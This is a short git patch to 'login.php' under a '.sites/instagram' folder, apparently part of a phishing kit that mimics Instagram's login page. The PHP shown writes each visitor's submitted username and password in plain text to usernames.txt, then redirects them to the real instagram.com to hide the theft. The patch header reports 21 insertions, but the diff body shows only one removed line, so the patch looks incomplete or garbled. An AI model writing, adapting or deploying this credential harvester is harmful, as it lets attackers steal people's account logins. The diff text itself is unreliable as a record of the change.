From e1ffbecb803871896b26a77100203ab8857695c4 Mon Sep 17 00:00:00 2001 From: 56-sys Date: Tue, 21 Jan 2025 11:25:32 -0400 Subject: [PATCH] Update login.php --- .sites/instagram/login.php | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/.sites/instagram/login.php b/.sites/instagram/login.php index b7a4f4ef..22116c32 100644 --- a/.sites/instagram/login.php +++ b/.sites/instagram/login.php @@ -1,6 +1,26 @@ file_put_contents("usernames.txt", "Instagram Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND); header('Location: https://instagram.com'); exit(); -?> \ No newline at end of file +?>